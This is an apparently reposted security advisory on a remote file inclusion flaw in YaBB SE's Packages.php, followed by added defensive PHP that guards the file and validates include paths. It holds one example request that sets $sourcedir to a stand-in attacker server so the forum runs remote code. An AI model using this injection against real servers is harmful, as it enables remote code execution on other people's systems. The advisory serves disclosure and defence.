Security flaw in YaBB allows unauthorized remote access:
YaBB is a free software forum that is quite widely used today. The flaw is found in Version 1.50 and earlier. In the yabb forum's Sources directory there is a file Packages.php, and the first lines of this file can allow attackers to gain unauthorized remote access and run dangerous commands.
Please see the full details below:
All versions prior to 1.5.0
----------------------
Vulnerability:
----------------------
YabbSE keeps all of its function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Below are a couple of the first lines in Packages.php:
********
..
global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";
include_once("$sourcedir/Packer.php");
..
********
We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.
Example:
http://victim/yabbse/Sources/Packages.php?...ttp://attacker/
where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.
Side-note: An attacker may also use this file for XSS attack on the server.
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.
----------------------
Greetz:
----------------------
Hawkje, Truckle, Cyon, daemorhedron, Mithrandir
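To show what the fix on the code side looks like, here is an added example of a guarded Packages.php header. It is not YaBB SE's own code and not part of the advisory above; the constant name YABB_SE_ENTRY and the helper safe_source_path are assumed names. It closes both halves of the problem the advisory describes: the file refuses to run when requested directly, and $sourcedir is derived from the file's own location instead of being left undefined for a register_globals injection to fill in.

```php
<?php
// Added example (not YaBB SE's own code): two guards that close the hole
// described in the advisory. Constant and helper names are assumptions.

// --- Guard 1: refuse to run when called directly ---------------------------
// The front controller (YaBB.php) would define this constant before it
// includes anything under Sources/. A direct request to
// Sources/Packages.php never goes through that entry point, so the constant
// is missing and the script stops before reaching any include_once().
if (!defined('YABB_SE_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access to this file is not allowed.');
}

// --- Guard 2: never let a request variable pick the include path -----------
// $sourcedir comes from this file's own directory, so there is no undefined
// global left for ?sourcedir=... to overwrite under register_globals.
$sourcedir = dirname(__FILE__);

/**
 * Return the absolute path of a sibling source file, or null if $name is not
 * a plain PHP filename that resolves inside $sourcedir. URL schemes, "../"
 * traversal and NUL bytes all fail the filename check; realpath() then
 * catches symlinks that would escape the Sources directory.
 */
function safe_source_path($sourcedir, $name)
{
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $name)) {
        return null;
    }
    $real = realpath($sourcedir . '/' . $name);
    $base = realpath($sourcedir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

global $adminplver;
$Packagesphpver = "YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";

// Only a file that physically exists under Sources/ can be included here.
$packer = safe_source_path($sourcedir, 'Packer.php');
if ($packer === null) {
    exit('Packer.php is missing or outside the Sources directory.');
}
include_once $packer;
```

The .htaccess workaround from the advisory ('Deny from all' in /Sources/) is still worth keeping alongside this, because it blocks the direct request at the web server before PHP runs at all. Turning register_globals off in php.ini removes the injection vector for every script on the host, not just this one, and is the setting to check first when auditing an installation of this age.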